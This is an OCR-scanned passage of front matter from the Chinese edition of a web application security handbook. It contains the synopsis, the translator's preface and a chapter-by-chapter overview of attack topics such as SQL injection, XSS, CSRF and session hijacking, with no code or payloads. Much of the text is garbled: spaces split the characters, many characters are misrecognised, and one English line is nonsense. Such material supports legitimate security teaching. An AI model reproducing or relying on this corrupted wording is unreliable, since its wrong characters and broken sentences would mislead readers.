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内 容 提要 


本 书 是 探索 和 人 研 究 Web 应 用 程序 安全 漏洞 的 实践 指南 。 作 者 利用 
大 量 的 实际 案例 和 示例 代码 ， 详 细 介 绍 了 各 类 Web 应 用 程序 的 弱点 ， 
并 深入 并 述 了 如 何 针对 Web 应 用 程序 进行 具体 的 渗透 测试 。 本 书 从 介 
绍 当前 Web 应 用 程序 安全 概况 开始 ， 重 点 讨论 渗透 测试 时 使 用 的 详细 
步骤 和 技巧 ， 最 后 总 结 书 中 袖 兰 的 主题 。 每 草 后 还 附 有 习题 ， 便 于 读 
者 巩固 所 学 内 容 。 

第 2 版 新 增 了 Web 应 用 程序 安全 领域 近年 来 的 发 展 变化 新 情况 ， 并 
以 竹 试 访问 的 链接 形式 提供 了 几 百 个 互动 式 “ 漏 洞 实 验 宇 "， 便 于 读者 
迅速 掌握 各 种 攻防 知识 与 技能 。 

本 书 适 合 各 层次 计算 机 安全 人 士 和 和 Web 开发 与 管理 领域 的 技术 人 
员 阅 坪 。 
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译 者 OF 


自 本 书 第 1 版 出 版 以 来 ，Web 安 全 状态 发 生 了 很 大 变化 ， 虽 然 随 着 
人 们 安全 意识 的 提高 ， 一 些 漏洞 已 经 得 到 修复 ， 但 随 着 各 种 新 技术 不 
断 诵 现 ， 特 别 是 web 2.0、HTML5、 无 线 互联 网 以 及 云 服务 的 推出 ， 
Web 应 用 程序 的 安全 将 面临 更 大 的 挑战 。 为 帮助 用 户 应 对 这 些 挑战 ， 
本 书 的 两 位 作者 对 第 1 版 的 内 容 进 行 了 修订 ， 新 增 了 约 30% 的 内 容 ， 主 
要 介绍 Web 安 全 领域 的 新 趋势 及 大 量 新 近 出 现 的 漏洞 。 

从 第 1 版 的 读者 反 啊 来 看 ， 大 多 数 读者 认为 本 书 内 容 较 深 ， 不 太 适 
合 初学 者 学 习 。 诚 然 ， 两 位 作者 都 是 web 安全 领域 的 资深 专家 ， 本 书 
更 是 他 们 多 年 职业 生涯 的 智慧 结晶 。 因 此 ， 建 议 读者 更 多 关注 书 中 介 
绍 的 基本 理论 及 作者 考虑 问题 的 角度 ， 而 不 是 具体 的 渗透 测试 方法 。 

应 一 些 读者 的 要 求 ， 我 们 推出 了 书 中 间 题 答案 的 中 文 版 ， 感 兴趣 
的 读者 可 以 访问 译 者 的 博客 

(http://blog.sina.com.cn/s/blog_545eb7860101379s.html) 或 图 灵 社 区 本 

书页 面 (http://www.ituring.com.cn/book/885) ° 

由 于 本 书 涉及 内 容 非 常 广泛 ， 加 之 译 者 水 平 所 限 ， 书 中 难免 存在 
琉 漏 甚至 错误 ， 译 者 在 此 恳请 读者 谅解 并 指正 。 

最 后 ， 向 朱 锡 、 刘 美英 等 诸位 编辑 表示 感谢 ， 谢 谢 你 们 的 无 私 帮 
助 。 还 要 感谢 我 的 家 人 ， 感 谢 你 们 的 默默 支持 。 
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AN ZIFF A H Web Dy. HIET 2c is Ta ASE H T o AE 
的 “Web 应 用 程序 ”是 指 通过 使 用 Web 浏 览 右 与 Web 服 务 器 进行 通信 ， 从 
而 加 以 访问 的 应 用 程序 。 本 书 不 仅 分 析 了 大 量 各 种 各 样 的 技术 ， 如 数 
文件 系统 与 Web 服 务 右 ， 而 且 讨 论 了 它们 在 Web 应 用 程序 中 的 
用 情况 。 
如 果 你 想 了 解 如 何 运 行 问 口 扫描 、 攻 击 防 火场 或 以 其 他 方式 对 服 
务 硕 进行 渗透 测试 ， 我 们 建议 你 阅读 其 他 图 书 。 但 是 ， 如 采 你 币 望 了 
解 渗透 测试 员 如 何 攻击 Web 应 用 程序 、 守 取 敏感 数据 、 执 行 未 授 权 操 
ee o 本 书 将 加 以 上 主题 展开 全 面 而 翔实 
J 讨论 。 


本 书 概述 


本 书 极其 注重 实用 性 。 虽 然 我 们 提供 了 足够 的 背景 信息 与 理论 知 
识 ， 以 帮助 读者 了 解 Web 应 用 程序 中 包含 的 漏洞 ， 但 是 ， 渗 透 测试 员 
在 攻击 Web 应 用 程序 时 所 需要 实施 的 步骤 及 采用 的 技巧 ， 才 十 我 们 讨 
论 的 重点 所 在 。 本 书 详细 阐述 了 探查 每 一 种 漏洞 所 需 采 用 的 特定 步 
又 ， 以 及 如 何 利用 它 执行 未 授权 操作 。 我 们 还 根据 多 年 的 工作 经 验 ， 
列 出 大 量 实例 ， 说 明 在 当今 Web 应 用 程序 中 存在 的 各 种 安全 漏洞 。 

另 一 方面 ， 安 全 意识 殴 像 一 把 双 刃 刘 。 开 发 者 能 够 从 了 解 攻击 者 
MHITA Ri: 相反 ， 墨 客 也 可 以 通过 了 解 应 用 程序 的 防御 机 
制 而 宁 探 它 的 受 攻击 面 。 除 介绍 安全 漏洞 与 攻击 技巧 外 ， 我 们 还 将 详 
细 介 绍 应 用 程序 为 抵御 攻击 者 而 采取 的 应 对 措施 。 同 时 ，Web 应 用 程 
序 渗透 测试 员 还 可 以 从 本 书 中 获得 大 量 实用 的 建议 ， 以 帮助 应 用 程序 
所 有 者 强化 他 们 的 应 用 程序 。 


本 书目 标 读者 


本 书 的 目标 读者 是 web 应 用 程序 渗透 测试 员 ， 以 及 负责 开发 和 管 
fie ° 

我 们 布 望 读者 熟悉 核心 安全 概念 ， 如 登录 和 访问 控制 ， 并 布 望 读 
者 掌握 基本 的 核心 Web 撤 术 ， 如 浏览 堪 、Web 服 务 厦 和 HTTP“。 通 过 阅 
读本 书 提供 的 解释 说 明 或 其 他 参考 闹 料 ， 可 以 迅速 弥补 当前 读者 在 这 
些 领域 的 知识 欠缺 。 

在 介绍 各 种 安全 漏洞 的 过 程 中 ， 我 们 将 提供 代码 片断 ， 说 明 应 用 
程序 为 何 易 受 攻击 。 这 些 示 例 都 非常 向 单 ， 不 需要 事先 了 解 编写 代码 
R 
aaa 


本 书 结构 


总 体 而 言 ， 本 书 根据 不 同 主题 之 间 的 依赖 天 系 将 内 容 组 织 在 一 
起 。 如 林 你 还 不 了 解法 客 是 如 何 攻 击 Web 应 用 程序 的 ， 应 该 从 头 至 尾 
读 完 本 书 ， 以 了 解 在 后 续 有 关 章 世 中 需要 用 到 的 表 景 信息 和 技巧 。 如 
果 你 在 这 方面 已 经 拥有 一 定 的 经 给， 可 以 直接 跳 到 特别 感 兴趣 的 任何 
章 廊 或 部 分 。 必 要 时 ， 我 们 将 提供 其 他 章 市 的 交叉 参考 ， 以 帮助 你 弥 
补 理解 上 的 欠缺 。 

本 书 前 3 草 介绍 一 些 背 景 信息 ， 描 述 当 前 Web 应 用 程序 的 安全 状 
况 ， 说 明 它 将 来 的 发 展 趋势 。 然 后 将 介绍 影响 Web 应 用 程序 的 核心 安 
全 问题 ， 以 及 应 用 程序 为 解决 这 些 问题 所 采取 的 防御 机 制 。 同 时 还 将 
介绍 当前 Web 应 用 程序 所 使 用 的 关键 技术 。 

本 书 的 主要 部 分 重点 讨论 核心 主题 一 一 渗透 测试 员 在 攻击 Web 应 
用 程序 时 使 用 的 技巧 。 我 们 根据 实施 全 面 攻击 所 需要 完成 的 关键 任务 
组 织 材料 ， 这 些 任 务 依次 为 : 解析 应 用 程序 的 功能 ， 检 查 和 攻击 它 的 
核心 防御 机 制 ， 探 查 特 殊 类 型 的 安全 漏洞 。 

最 后 3 草 对 本 书 洱 兰 的 各 种 主题 进行 商 要 总 结 : 描述 如 何在 应 用 程 
序 源 代码 中 查找 漏洞 ;回顾 能 够 帮助 渗透 测试 员 攻 击 Web 应 用 程序 的 
工具 ; 详细 介绍 攻击 方法 论 ， 说 明 渗透 测试 员 如 何 对 一 个 目标 应 用 程 
序 实 施 全 面 而 深入 的 攻击 。 

第 1 章 描述 当前 在 因特网 上 运行 的 Web 应 用 程序 的 安全 状况 。 尽 管 
软件 丙 当 第 保证 Web 应 用 程序 古 安 全 的 ， 但 绝 大 多 数 的 应 用 程序 并 不 
真正 安全 ， 只 要 掌握 一 些 技巧 ， 殊 能 够 攻破 它们 。Web 应 用 程序 中 的 
漏洞 源 于 一 个 核心 问题 ， 用 户 可 提交 任意 输入 。 这 一 革 将 分 析 造 成 当 
今 应 用 程序 安全 状况 不 佳 的 关键 因素 ， 并 说 明 Web 应 用 程序 中 存在 的 
缺陷 如 何 寻 致 组 织 庞大 的 技术 基础 架构 非常 易于 受到 攻击 。 

第 2 章 描述 Web 应 用 程序 为 解决 “所 有 用 户 输入 都 不 可 信 ?” 这 个 基本 
问题 而 采用 的 核心 安全 机 制 。 应 用 程序 通过 这 些 机 制 管理 用 户 访问 、 
控制 用 户 输 入 、 抵 御 攻 击 者 。 这 些 机 制 还 为 管理 员 提 供 各 种 功能 ， 帮 
助 他 们 管理 和 监控 应 用 程序 目 身 。 应 用 程序 的 核心 安全 机 制 还 是 它 的 
主要 受 攻击 面 ， 在 对 它们 实施 有 效 攻 击 前 ， 渗 透 测试 员 必 须 了 解 这 些 
机 制 的 工作 原理 。 

第 3 章 简要 介绍 渗透 测试 员 在 攻击 Web 应 用 程序 时 可 能 过 到 的 关键 
技术 ， 包 括 相 关 HITP 协 议 、 客 户 端 与 服务 大 端 币 用 的 技术 以 及 各 种 数 


所 编码 方 案 。 已 经 吕 悉 主要 Web 技 术 的 读者 可 以 跳 过 本 章 。 

第 4 章 描述 活 透 测试 员 在 攻击 一 个 新 的 应 用 程序 时 所 需 采 取 的 第 一 
步 ， 即 尽 可 能 多 地 收集 与 应 用 程序 有 关 的 信息 ， 以 确定 它 的 受 攻击 
面 ， 制 订 攻 击 计划 。 渗 透 测 试 员 需 要 搜索 并 探查 应 用 程序 ， 枚 举 它 的 
全 部 内 容 与 功能 ， 确 定 所 有 用 户 输 入 进入 点 并 查 明 它 所 使 用 的 技术 。 

第 5 章 描述 了 存在 漏洞 的 第 一 个 区 域 。 如 采 一 个 应 用 程序 依靠 在 客 
户 端 实现 的 控件 来 保护 它 的 安全 ， 束 可 能 造成 这 种 漏洞 。 这 种 保护 应 
用 程序 的 方法 往往 存在 缺陷 ， 因 为 攻击 者 可 轻易 避 开 任何 客户 端 控 
件 。 应 用 程序 易于 受到 攻击 的 原因 有 两 个 (1) 通过 客户 端 传送 数 
据 ， 认 为 这 些 数据 不 会 被 修改 ; (2) 依赖 客户 端 对 用 户 输 入 进行 检 
查 。 这 一 章 将 介绍 一 系列 有 用 的 技术 ， 包 括 HTML、HTTP 与 JavaScript 
所 采用 的 轻 量 级 控件 ， 以 及 使 用 Java applet、ActiveX 控 件 、Silverlight 
和 Flash 对 象 的 重量 级 控件 。 

第 6 一 8 章 将 主要 介绍 Web 应 用 程序 中 最 重要 的 防御 机 制 一 一 负责 
控制 用 户 访 问 的 机 制 。 第 6 昔 描 述 应 用 程序 确认 用 户 和 喘 份 的 各 种 功能 ， 
包括 主 登 录 功 能 和 更 加 外 围 的 与 验证 有 关 的 功能 ， 如 用 户 注 册 、 密 码 
修改 和 账户 恢复 功能 。 验 证 机 制 在 设计 和 执行 方面 都 包含 大 量 漏洞 ， 
攻击 者 能 够 利用 它们 获得 未 授权 访问 。 这 些 漏洞 包括 明显 的 缺陷 ， 如 
保密 性 不 强 的 密码 和 易于 受到 蛮 力 攻击 ， 以 及 验证 逻辑 中 存在 的 更 微 
妙 的 问题 。 这 一 章 还 将 详细 分 析 许 多 安全 性 至 天 重要 的 应 用 程序 所 采 
用 的 多 阶段 登录 机 制 ， 并 描述 这 些 机 制 中 频繁 出 现 的 新 型 漏洞 。 

第 7 章 介绍 会 话 管理 机 制 。 大 多 数 应 用 程序 通过 有 状态 会 话 这 个 概 
念 补充 无 状态 的 HTTP 协 议 ， 帮 助 它们 在 不 同 的 请 求 中 确定 每 个 用 户 的 
号 份 。 当 Web 应 用 程序 受 攻击 时 ， 这 个 机 制 是 一 个 主要 的 攻击 目标 ; 
因为 如 果 能 够 攻破 它 ， 束 能 够 有 效 避 开 登 隶 机制， 伪装 成 其 他 用 户 ， 
而 不 必 知 道 他 们 的 证 书 。 这 一 章 还 将 分 析 生 成 和 传送 会 话 令 牌 过 程 中 
存在 的 各 种 常见 漏洞 ， 并 描述 发 现 和 利用 这 些 漏 洞 所 需 采 取 的 步骤 。 

第 8 章 说 明 应 用 程序 如 何 实施 访问 控制 。 应 用 程序 主要 依靠 验证 与 
会 话 管理 机 制 来 完成 这 项 任务 。 本 章 将 介绍 各 种 破坏 访问 控制 的 技 
巧 ， 以 及 探查 和 利用 这 些 弱点 的 方法 。 

第 9 章 和 第 10 章 介绍 大 量 相 关 漏 洞 。 如 果 应 用 程序 以 不 安全 的 方式 
在 解释 型 代码 中 插入 用 户 输入 ， 殊 会 造成 这 些 漏洞 。 第 9 章 首 移 详细 介 
绍 SQL 注 入 漏洞 ， 讨 论 各 种 攻击 方法 ， 从 最 明显 、 最 简单 的 方法 到 一 
系列 高 级 攻击 技巧 《如 带 外 通道 、 推 新 和 时 间 延 迟 ) 。 对 于 每 一 种 漏 
洞 和 攻击 技巧 ， 我 们 将 描述 3 种 常用 数据 库 (MS-SQL、Oracle 和 


MySQL) 之 间 的 相关 差异 ， 然 后 介绍 一 系列 针对 其 他 数据 存储 (包括 
NoSQL、XPath 和 LDAP) 的 类 似 攻击 ° 

第 10 章 介绍 几 种 其 他 类 型 的 注入 漏洞 ， 包 括 注 入 操作 系统 命令 ， 
注入 Web 脚 本 语言 ， 文 件 路 径 遍 历 攻击 ， 文 件 包 含 漏 洞 ， 注 入 XML ` 
SOAP、 后 端 HITP 请 求 和 电子 邮件 服务 。 

第 11 章 将 介绍 应 用 程序 受 攻击 面 的 一 个 重要 的 、 常 被 人 们 忽略 的 
区 域 一 一 实现 其 功能 的 内 部 逻辑 。 应 用 程序 逻辑 中 的 漏洞 各 不 相同 ， 
它们 比 SQL 注 入 与 跨 站 点 脚本 之 类 的 常见 漏洞 更 难以 辨别 。 为 此 ， 我 
们 将 列举 一 系列 实例 ， 其 中 存在 的 逻辑 缺陷 导致 应 用 程序 易于 受到 攻 
击 ， 借 此 说 明 应 用 程序 设计 者 与 开发 者 所 做 出 的 各 种 错误 假设 。 根 据 
这 些 各 不 相同 的 缺陷 ， 我 们 将 进行 一 系列 特殊 测试 ， 以 确定 许多 常常 
难以 探测 的 逻辑 缺陷 。 

第 12 章 和 第 13 章 介绍 一 类 广泛 存在 且 广 受 关 注 的 相关 漏洞 ， 即 应 
用 程序 的 恶意 用 户 利 用 Web 应 用 程序 中 的 缺陷 攻击 其 他 用 户 ， 并 以 各 
种 方式 攻破 这 些 用 户 。 第 12 章 介绍 这 中 最 主要 的 漏洞 一 一 一 种 影响 因 
特 网 上 的 绝 大 多 数 Web 应 用 程序 的 广泛 存在 的 漏洞 。 我 们 将 详细 分 析 
各 种 类 型 的 XSS 漏 洞 ， 并 介绍 检测 和 利用 即使 是 最 难以 察觉 的 XSS 漏 
洞 的 有 效 方法 。 

第 13 章 介绍 针对 其 他 用 户 的 几 种 其 他 类 型 的 攻击 ， 包 括 通过 请 求 
伪造 和 UI 伪 北 诱 使 用 户 执 行 探 作 、 使 用 各 种 客户 端 技术 跨 域 获取 数 
据 、 各 种 针对 同 源 策 略 的 攻击 、HTTP 消 息 头 注入 、cookie 注 入 和 会 话 
固定 、 开 放 式 重 定向 、 客 户 端 SQL 注 入 、 本 地 隐私 攻击 以 及 利用 
ActiveX 探 件 中 的 漏洞 。 最 后 ， 我 们 将 讨论 一 系列 不 依赖 任何 特定 Web 
应 用 程序 中 的 漏洞 、 但 可 以 通过 任何 恶意 Web 站 点 或 处 于 适当 位 置 的 
攻击 者 实施 的 针对 用 户 的 攻击 。 

第 14 章 并 不 介绍 任何 新 的 漏洞 ， 而 是 描述 一 种 渗透 测试 员 攻击 
Web 应 用 程序 时 需要 掌握 的 技巧 。 由 于 每 种 应 用 程序 都 各 不 相同 ， 大 
多 数 攻击 都 经 过 某 种 方式 的 定制 〈 或 自 定 义 ) ， 以 针对 应 用 程序 的 特 
殊 行为 ， 以 及 发 现 对 攻击 有 利 的 操纵 方法 。 这 些 攻击 还 要 求 提 出 大 量 
相似 的 请 求 ， 并 监控 应 用 程序 的 响应 。 手 动 执 行 这 些 请 求 非常 费力 ， 
而 且 容 易 出 错 。 要 成 为 真正 熟练 的 web 应 用 程序 黑客 ， 必 须 尽 可 能 
动 实施 攻击 步骤 ， 使 定制 攻击 更 加 简单 、 人 快捷 而 高 效 。 本 章 将 详细 摘 
述 一 种 行 之 有 效 的 方法 ， 以 完成 这 项 任务 。 我 们 还 将 讨论 在 使 用 目 动 
化 技巧 时 过 到 的 各 种 障碍 ， 包 括 防御 性 的 会 话 处 理 机 制 和 CAPTCHA 
控件 。 此 外 ， 我 们 还 将 介绍 可 用 于 克服 这 些 障碍 的 工具 和 技巧 。 


第 15 章 分 析 应 用 程序 如 何在 遭受 攻击 时 泄露 信息 。 当 实施 本 书 描 
述 的 其 他 各 种 攻击 时 ， 活 透 测试 员 应 该 始终 监控 应 用 程序 ， 以 确定 其 
他 可 供 利用 的 信息 泄露 来 源 。 我 们 将 介绍 如 何 分 析 应 用 程序 的 反常 行 
为 与 错误 消息 ， 以 深入 了 解 应 用 程序 的 内 部 工作 机 制 ， 并 细 化 攻击 。 
敏感 信息 。 

第 16 章 介绍 在 以 C 和 C++ 等 本 地 代码 语言 编写 的 应 用 程序 中 存在 的 
一 些 重要 漏洞 。 这 些 漏洞 包括 缓冲 区 溢出 、 整 数 漏洞 和 格式 化 字符 串 
漏洞 。 这 个 主题 涉及 的 内 容 非常 广泛 ， 我 们 将 重点 讨论 如 何在 Web 应 
用 程序 中 探查 这 些 漏洞 ， 并 分 析 一 些 实 例 ， 了 解 造成 这 些 漏 洞 的 原 
因 ， 以 及 如 何 对 它们 加 以 利用 。 

第 17 章 介绍 一 个 常 被 忽略 的 Web 应 用 程序 安全 领域 。 许 多 应 用 程 
序 采 用 一 种 分 层 架 构 ， 无 法 恰当 地 隔离 这 些 层面 可 能 会 导致 应 用 程序 
易于 受到 攻击 ， 导 致 攻击 者 能 够 利用 在 其 中 一 个 组 件 中 发 现 的 漏洞 迅 
速 攻破 整个 应 用 程序 。 共 享 托管 环境 带 来 另外 一 些 严重 的 威胁 ， 有 
时 ， 攻 击 者 可 以 利用 一 个 应 用 程序 中 存在 的 缺陷 或 恶意 代码 攻破 整个 
环境 及 其 中 运行 的 其 他 应 用 程序 。 本 章 还 会 介绍 一 种 众所周知 的 共享 
托管 环境 “ 云 计算 ”中 出 现 的 各 种 威胁 。 

第 18 章 描述 各 种 攻击 技巧 ， 说 明 如 何 通 过 攻击 Web 服 务 器 进而 攻 
击 其 中 运行 的 Web 应 用 程序 。Web 服 务 器 中 存在 的 漏洞 主要 包括 服务 
器 配置 方面 的 漏洞 以 及 Web 服 务 器 软件 中 的 安全 漏洞 。 这 个 主题 属于 
本 书 的 讨论 范围 ， 因 为 严格 来 讲 ，Web 服 务 器 是 技术 栈 的 另 一 个 组 
件 。 但 是 ， 大 多 数 Web 服 务 器 都 与 在 它们 之 中 运行 的 Web 应 用 程序 关 
系 密 切 。 因 此 ， 本 书 介绍 针对 Web 服 务 器 的 攻击 ， 因 为 攻击 者 常常 可 
以 利用 它们 直接 攻破 一 个 应 用 程序 ， 而 不 是 首先 间接 攻破 基础 主机 ， 
然后 再 攻击 Web 应 用 程序 。 

第 19 章 描述 另外 一 种 查找 安全 漏洞 的 方法 。 这 种 方法 与 本 书 其 他 
章节 讨论 的 方法 截然 不 同 。 许 多 时 候 ， 我 们 都 可 以 对 应 用 程序 的 源 代 
码 进 行 审查 ， 并 旦 不 必得 到 应 用 程序 所 有 者 的 协助 。 通 常 ， 审 查 应 用 
程序 的 源 代码 可 以 迅速 确定 一 些 漏洞 ， 但 在 运行 的 应 用 程序 中 探查 这 
些 漏洞 可 能 极其 困难 ， 或 者 需要 耗费 许多 时 间 。 我 们 将 介绍 一 种 代码 
审查 方法 ， 并 简要 说 明 如 何 对 以 各 种 语言 编写 的 代码 进行 审查 ， 以 帮 
助 读者 在 编程 经 验 不 足 的 情况 下 进行 有 效 的 代码 审查 。 

第 20 章 详细 介绍 本 书 描述 的 各 种 工具 。 笔 者 在 攻击 真实 的 Web 应 
用 程序 时 使 用 的 就 是 这 些 工具 。 我 们 将 分 析 这 些 工具 的 主要 功能 ， 并 
详细 描述 充分 运用 这 些 工具 的 工作 流 类 型 。 男 外 ， 讨 论 一 些 全 目 动 工 


具 能 否 有 效 地 发 现 Web 应 用 程序 中 存在 的 漏洞 ， 并 提供 一 些 提 示 和 建 
议 ， 说 明 如 何 充 分 利用 工具 包 。 

第 21 划 综合 介绍 本 书 拉 述 的 所 有 攻击 步 骂 与 技巧 。 我 们 将 根据 渗 
透 测试 员 在 实施 攻击 时 所 需 完 成 的 任务 之 间 的 逻辑 依赖 关系 来 组 织 这 
些 步 骤 与 技巧 ， 并 对 它们 进行 排序 。 如 采 你 已 经 阅读 并 理解 书 中 摘 述 
的 各 种 漏洞 和 攻击 技巧 ， 束 可 以 把 这 个 方法 当 作 一 个 完整 的 清单 和 工 
作 计 划 ， 对 Web 应 用 程序 实施 渗透 测试 。 


新 增 内 容 简 介 


第 1 版 出 版 4 年 以 来 ， 许 多 事情 发 生 了 改变 ， 而 许多 事情 仍 保持 原 
状 。 当 然 ， 新 技术 继续 高 速 发 展 ， 这 引发 了 各 种 新 型 漏洞 和 攻击 。 同 
时 ， 墨 客 们 还 开发 出 了 新 的 攻击 技术 ， 设 计 了 利用 上 日 有 漏洞 的 新 方 
法 。 但 是 ， 这 些 技 术 或 人 为 因素 都 不 可 能 引发 革命 。 今 天 应 用 程序 采 
用 的 技术 早 在 许多 年 前 就 已 经 确立 ， 现 今 的 先进 攻击 技术 所 列 涵 的 基 
本 概念 也 早 在 高 效应 用 这 些 技 术 的 许多 研究 人 员 出 生 之 前 就 已 经 成 
形 。Web 应 用 程序 安全 是 一 个 动态 且 充 满 活力 的 研究 领域 ， 但 多 年 
来 ， 人 类 积累 的 智慧 也 在 缓慢 进化 ， 因 此 ， 当 前 的 技术 状况 与 10 年 或 
更 久 以 前 的 情况 截然 不 同 。 

第 2 版 并 不 是 对 第 1 版 的 彻底 改写 ， 第 1 版 的 大 部 分 内 容 ， 现 在 仍然 
适用 。 第 2 版 约 30% 的 内 容 为 新 增 内 容 或 改动 很 大 ， 剩 余 70% 的 内 容 仅 
有 小幅 改 动 或 未 作 任何 修改 。 如 果 读 者 购买 了 本 书 ， 但 对 这 些 改动 感 
到 失望 ， 请 不 要 放弃 。 如 果 你 已 经 掌握 了 第 1 版 中 介绍 的 所 有 技巧 ， 说 
明 你 已 经 学 会 所 需 的 绝 大 部 分 技能 和 知识 。 这 样 的 话 ， 你 就 可 以 集中 
精力 学 习 本 书 的 新 增 内 容 ， 迅 速 了 解 Web 应 用 程序 安全 领域 近年 来 的 
发 展 变化 情况 。 

第 ?版 的 一 个 显著 特点 是 ， 在 整 本 书 中 提供 了 所 介绍 的 几乎 所 有 漏 
洞 的 真实 示例 。 读 者 可 以 使 用 “党 试 访 问 ” 链 接 以 交互 方式 在 线 运行 书 
中 讨论 的 示例 ， 以 确认 可 以 发 现 并 利用 其 中 包含 的 漏洞 。 书 中 提供 了 
几 百 个 “示例 实验 室 ”， 读 者 可 以 根据 自己 阅读 本 书 的 进度 逐个 访问 这 
些 “ 实 验 室 ”。 访 问 这 些 在 线 “ 实 验 室 ”需要 支付 一 定 的 订阅 费用 ， 这 些 
费用 主要 用 于 管理 和 维护 相关 基础 设施 。 

如 果 读 者 希望 集中 精力 学 习 第 2 版 中 的 新 增 内 容 ， 以 下 是 对 新 增 或 
改写 内 容 的 汇总 。 

第 1 章 仅 部 分 内 容 有 所 改动 ， 将 介绍 Web 应 用 程序 的 新 应 用 、 技 术 
领域 的 一 些 显著 趋势 ， 以 及 组 织 的 典型 安全 边界 将 如 何 继续 发 展 变 


化 。 

第 2 章 仅 有 小 幅 改 动 ， 新 增 内 容 将 介绍 几 个 用 于 避 开 输入 确认 防御 
的 常规 技巧 示例 。 

第 3 章 增加 了 几 节 新 内 容 ， 主 要 介绍 各 种 新 技术 及 已 在 第 1 版 中 简 
要 介绍 的 技术 。 新 增 的 主题 包括 REST、Ruby on Rails ` SQL ` XML ` 


Web 服 务 、CSS、VBScript、 文 档 对 象 模型 、Ajax、JSON、 同 源 策略 
和 HTML5。 
第 4 章 仅 有 少量 更 新 ， 以 反映 用 于 解析 内 容 和 功能 的 技术 的 发 展 趋 


第 5 章 进行 了 大 幅 改 动 。 具 体 来 说 ， 基 本 上 重新 编写 了 有 关 浏 览 右 
扩展 技术 的 几 市 内 容 ， 详 细 介 绍 了 有 反 编 译 和 调试 字 市 码 的 常规 方法 、 
如 何 处 理 常 规格 式 的 序列 化 数据 ， 以 及 如 何 处 理 渗透 测试 过 程 中 遇 到 
的 常见 问题 ， 包 括 不 文 持 代理 的 客户 端 和 SSL 问 题 。 本 章 还 将 介绍 
Silverlight 技 术 。 

第 6 草 内 容 与 现今 情况 保持 一 致 ， 仅 有 小 幅 改 动 。 

第 7 章 新 增 内 容 主要 介绍 目 动 测试 令 牌 随机 性 的 新 工具 。 本 章 还 包 
含有 天 攻击 加 密令 牌 的 新 内 容 ， 包 括 如 何在 不 了 解 所 使 用 的 加 密 算 法 
或 加 密 密 角 的 情况 下 得 改 令 牌 的 实用 技巧 。 

第 8 章 将 介绍 一 些 访问 控制 漏洞 ， 包 括 由 直接 访问 服务 器 端 方法 以 
及 平台 配置 不 当 (将 基于 HTTP 的 方法 用 于 执行 访问 控制 ) 导致 的 漏 
洞 。 本 半 还 将 介绍 一 些 新 工具 和 技巧 ， 可 在 一 定 程度 上 上 自动 完成 测试 
访问 控制 鸭 繁琐 任务 。 

第 9 章 和 第 10 章 的 内 容 经 过 重组 ， 因 而 变 得 更 易于 管理 ， 其 章节 安 
排 也 更 符合 逻辑 。 第 9 章 主要 介绍 针对 其 他 数据 存储 技术 的 SQL 注入 和 
其 他 类 似 攻 击 。 由 于 SQL 注入 漏洞 已 广为人知 ， 并 且 在 很 大 程度 上 得 
到 了 解决 ， 因 此 ， 本 章 将 着 重 介 绍 现 在 仍然 可 以 发 现 SQL 注 入 漏洞 的 
实际 情形 。 本 章 的 其 他 内 容 也 有 人 小幅 改动 ， 将 介绍 当前 的 技术 和 攻击 
方法 。 同 时 ， 本 章 还 新 增 了 一 节 内 容 ， 用 于 说 明 如 何 使 用 自动 化 工具 
来 利用 SQL 注 入 漏洞。 有 天 LDAP 注 入 的 内 容 经 过 大 幅 改 动 ， 以 更 详细 
地 介绍 特定 技术 (Microsoft Active Directory 和 OpenLDAP) ， 以 及 利 
用 常见 漏洞 的 新 技巧 。 此 外 ， 本 章 还 将 介绍 针对 NoSQL 的 攻击 。 

第 10 章 讨论 以 前 在 第 1 版 第 9 章 中 介绍 的 其 他 类 型 的 服务 器 端 注 入 
漏洞 。 痢 增 内 容 主要 介绍 XML 外 部 实体 注入 和 注入 后 端 HTTP 请 求 ， 
包括 HTTP 参 数 注 入 /污染 和 注入 URL 改 写 方案 。 

第 11 章 将 提供 更 多 常见 输入 确认 功能 逻辑 缺陷 的 示例 。 由 于 越 来 
越 多 的 应 用 程序 采用 加 密 来 保护 静态 数据 ， 本 章 还 将 介绍 如 何 确定 并 
利用 加 密 提示 来 解密 加 密 数 据 的 示例 。 

第 1 版 的 第 12 革 主要 介绍 针对 其 他 应 用 程序 用 户 的 攻击 。 第 2 版 将 
这 一 革 内 容 放 到 了 两 草 中 ， 因 为 这 些 内 容 过 于 繁杂 ， 不 易 管理 。 第 12 
革 主 要 讨论 XSS， 相 关内 容 经 过 大 幅 改 动 。 有 天 如 何 避 开 防 御 过 滤 以 
插入 脚本 代码 的 内 容 已 完全 重 写 ， 主 要 介绍 一 些 新 技术 和 新 技巧 ， 包 
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括 在 当前 浏览 絮 中 执行 脚本 代码 的 各 种 鲜 为 人 知 的 方法 。 同 时 ， 本 童 
还 将 更 详细 地 介绍 如 何 对 脚本 代码 进行 模糊 处 理 ， 以 避 开 常用 的 输入 
过 滤 的 方法 。 本 章 还 将 介绍 一 些 现实 中 新 出 现 的 XSS 攻 击 示 例 。 新 增 
一 节 内 容 介 绍 了 如 何在 充满 挑战 的 情况 下 实施 有 效 的 XSS 攻 击 ， 涵 访 
如 何 将 攻击 扩散 到 所 有 应 用 程序 页 面 、 如 何 通 过 cookie 和 Referer 消 忆 
头 利 用 XSS， 以 及 如 何在 XML 等 非 标 准 请 求 和 啊 应 内 容 中 利用 XSS。 
此 外 ， 本 章 还 将 分 析 浏 览 器 的 内 置 XSS 过 小 絮 ， 以 及 如 何 避 开 这 些 过 
滤器 来 实施 攻击 。 新 增 几 节 还 将 讨论 在 Web 邮 件 应 用 程序 和 上 传 文件 
中 利用 XSS 的 特定 技巧 。 本 章 最 后 介绍 可 用 于 阻止 XSS 攻 击 的 各 种 新 
的 防御 措施 。 

第 13 章 为 新 增 的 一 章 ， 人 介绍“ 攻击 用 户 ” 这 一 涉及 广泛 的 主题 的 其 
他 内 容 。 有 关 跨 站 点 请 求 伪 造 的 主题 经 过 更 新 ， 将 介绍 针对 登录 功能 
的 攻击 、 反 CSRF 防 御 中 的 常见 缺陷 、UI 伪 装 攻击 ， 以 及 破坏 框架 防御 
中 的 常见 缺陷 。 跨 域 捕 获 数据 一 节 〈13.2 节 ) 将 介绍 如 何 通 过 注入 包 
含 非 脚 本 HTML 和 CSS 的 文本 来 镭 取 数据 的 拉 巧 ， 以 及 各 种 使 用 
JavaScript 和 E4X 跨 域 捕 获 数 据 的 技巧 。 新 增 一 太 更 详细 地 介绍 同 源 策 
略 ， 包 括 其 在 不 同 浏览 器 扩展 技术 中 的 实施 情况 、HTML5 种 来 的 改 
变 ， 以 及 通过 代理 服务 应 用 程序 跨 域 操作 的 方法 。 男 设 新 增 广 介绍 客 
